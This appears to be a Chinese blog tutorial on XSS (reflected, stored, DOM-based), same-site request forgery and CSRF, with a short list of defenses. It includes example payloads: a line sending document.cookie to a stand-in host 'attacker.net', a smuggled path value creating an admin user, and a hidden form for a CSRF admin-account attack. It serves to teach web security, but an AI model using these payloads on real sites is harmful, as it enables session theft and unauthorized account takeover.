XSS 和 CSRF 两种跨站攻击
差不多刚开始接触前端的时候,经常能看到一些早几年入行大牛们的简历,几乎所有人都会在简历中带上这么一句话:具备基本的 Web 安全知识(XSS / CSRF)。显然这已经成为前端人员的必备知识。
非常怀念那个 SQL 注入还没有被普遍认可的年代,虽然这么多年过去了,SQL 注入并没有消失,仍然是最危险的漏洞。关于 SQL 注入的原理,可以看我之前写的文章SQL 注入详解。今天是主题是 Web 安全的另外两大杀手,XSS 和 CSRF。
1. XSS 的分类
XSS 漏洞有多种形式,分为三类,反射型、保存型和基于 DOM 的 XSS 攻击。这些漏洞的基本原理都是一样的,但是确定和利用漏洞方面又存在很大的差异,下面将对这三种漏洞详细介绍。
1.1. 反射型 XSS 漏洞
前面废话一大堆,还是没有说 XSS 漏洞到底是什么。如果一个 Web 程序可以动态的显示用户的错误消息,就有可能会产生反射型漏洞。
用户浏览网页时发送错误,向服务器请求 URL,比如www.xxx.com/error.php?message=sorry,an error occurred
,然后服务器根据得到的 message,不进行过滤,复制到错误页面的模板中:<p>sorry,an error occurred</p>
,返回给用户。
这个漏洞有一个显著的特征,应用程序没有进行任何过滤或净化措施,就非常容易受到攻击。www.xxx.com/error.php?message=<script>alert(1)</script>
,当用户打开错误页面时,就会出现<p><script>alert(1)</script></p>
,弹出一个消息框。
显然,攻击人员不会很傻的仅仅 alert 一些消息,在 IE 中,如果开启跨站点脚本检测可能无法弹出消息。通常 XSS 都会伴随着会话劫持,攻击者截获通过验证的用户的会话令牌。劫持用户的会话后,攻击者就可以访问该用户授权访问的所有数据和功能。
比如攻击者构造一个这样的 URL,message 信息如下
var i = new Image; i.src="http://attacker.net/"+document.cookie;
这样被攻击者通过访问这个恶意的 URL,就会把 cookie 发送给黑客,黑客截获 cookie,就能执行用户的任意操纵。
由于浏览器的同源策略,直接向 attacker.net 发送 document.cookie 是无法获得 www.xxx.com 的 cookie,因为浏览器会对不同源(域)的内容进行隔离,这就是该漏洞被称为跨站脚本的原因。
1.2. 保存型 XSS 漏洞
保存型跨站脚本也是比较常见的漏洞,脚本通常保存在后端数据库中,不经过滤就存储并且显示给用户,此时就会出现这种漏洞。
与反射型的流程不同的是,保存型需要向服务器提出至少两次请求,第一次将含有恶意代码的数据提交给服务器,服务器将数据保存,第二次是受害者想服务器提出访问含有恶意代码数据的页面,恶意代码执行。
与反射型不同的是,保存型不需要一个专门设计的 URL 来接收 cookie,只需要将含有恶意代码的页面发给用户,等待受害者访问即可。不过,也可用保存型的漏洞来获取用户 cookie 进行劫持。
还有一个不同点,反射型的漏洞,必须要等受害者登陆后,才能保证 cookie 的正常获得,而保存型的漏洞,受害者一般是先登录,然后访问改站点有危险的页面。
举一个例子,比如某社交论坛存在保存型的 XSS 漏洞,黑客将自己的个人信息一栏修改成恶意的 JS 代码,改代码实现两个功能,首先受害者加自己为好友,其次修改受害者的个人信息为该恶意代码。黑客把个人信息保存并提交给服务器,只需要等受害者访问自己的个人信息页面,浏览器就会执行该恶意脚本,于是可怕的“蠕虫”就开始了。
1.3. 基于 DOM 的 XSS 漏洞
前两种 XSS 漏洞,都表现一种特殊的模式,就是应用程序提取数据并返回给受害者,而基于 DOM 的 XSS 不具有这种特点,攻击者是借助于 JavaScript 来展开攻击的。
- 用户请求一个经过专门设计的 URL,由攻击者提交,包括嵌入式的 JavaScript;
- 服务器的响应不包含任何攻击者的脚本,同时服务器也不会对 URL 进行检测;
- 当用户浏览这个响应时,脚本得以处理。
与反射型漏洞类似,都是对 URL 进行特殊构造,不同的是,反射型是由服务器处理 URL,而 DOM 型是由 JavaScript 脚本来处理。还以刚才那个反射型为例子,假设应用程序返回的错误页面包含以下 JS 脚本:
<script> // www.xxx.com/error.php?message=sorry,an error occurred var url = document.location; var message = /message=(.+)$/.exec(url)[1]; document.wirte(message); //或者 document.getElementById("show").innerHTML = message; </script>
同样给受害者发送这样的链接 www.xxx.com/error.php?message=<script>alert(1)</script>
,也可以开展 XSS 漏洞攻击。基于 DOM 的漏洞不局限与 URL,还可以是页面某个 DOM 的内容,这和存储型的 XSS 又联系到一起。
这个时候就需要些 JS 的同学小心谨慎了,万一写出含有漏洞的代码,这锅得自己背。
2. 请求伪造
在 XSS 跨站攻击中,攻击者需要获得受害者的会话令牌,请求伪造也与会话劫持相关,但是攻击者不需要知道受害者的会话令牌,就能够行驶“受害者”的权利。请求伪造有两种,本站点请求伪造(OSRF)和跨站点请求伪造(CSRF),
2.1. OSRF
OSRF 是一种利用保存型 XSS 漏洞的攻击载荷,如果在得知应用程序对 XSS 漏洞过滤的情况下,可以尝试 OSRF 攻击。
比如这是一个某站点 POST 请求,该站点过滤 XSS 攻击,
POST /submit.php
Host: xxx.com
Content-Length: ..
type=question&name=ge&message=mes
然后该信息将会被插入到如下的 HTML 中:
<tr> <td><img src="/images/question.jpg"></td> <td>ge</td> <td>mes</td> </tr>
这个漏洞很容易利用,直接用 type 的值来表示 jpg 的name,然后我们构造 type 的值等于下面的内容(这不就是利用路径来搞事吗),
../admin/newuser.php?username=test&password=123&role=admin#
使用上面的介绍,相对应的构造一个表单提交,创建一个管理员权限的用户,普通用户点击是不会成功的,因为权限不够,但是如果是管理员点击该链接的话,就会创建一个秘密账户,所以,即时对 URL 禁用了 JavaScript 脚本,还是可以通过 OSRF 攻击成功。
在攻击字符串的最后使用了 # ,是为了对 .jpg 进行屏蔽,也可以添加 & 组成另一个参数。
以上便是一个简单的本站点请求伪造的例子。
2.2. CSRF
跨站点请求伪造才是跨站伪造的重点内容,攻击者只需要创建一个看似无害的网站,致使受害者的浏览器直接向易受攻击的服务器提交一个请求,执行恶意代码。
仍然需要考虑同源策略,仍然以管理员创建新用户为例,
POST /newUser.php HTTP/1.1
Host: xxx.com
Cookie: SessionId=...
Content-Length: ..
name=ro&userrole=admin&password=123456&confirmpassword=123456
黑客构造的网站会提交一个 form 表单,并想办法让 form 隐藏:
<<!DOCTYPE html> <html><body> <form action="http://xxx.com/newUser.php" method="POST"> <input type="hidden" name="name" value="ro"> <input type="hidden" name="userrole" value="admin"> <input type="hidden" name="password" value="123456"> <input type="hidden" name="confirmpassword" value="123456"> </form> </body></html>
当管理员已经登陆的情况下,访问这个恶意网站的时候,就会提交这段脚本,管理员都不知情。因为管理员已经登陆,无需考虑 Cookie 的问题,一个简单的 CSRF 如此。
3. 总结
其实攻击很简单,主要的还是如何防御,比如
- 对一些关键字和特殊字符进行过滤或 URL、HTML 编码,"<>?"或"script,javascript";
- Cookie 防盗,在 Cookie 中防止放入用户名和密码,对 Cookie 信息进行 MD5 等算法进行多次散列存放,必要时还要对 ip 和 cookie 进行绑定,一旦检测异常,立马让用户重新登录;
- 严格控制 URL 访问,对于一些挂马的 ip 和域名,强制无法访问;
- 等等
共勉。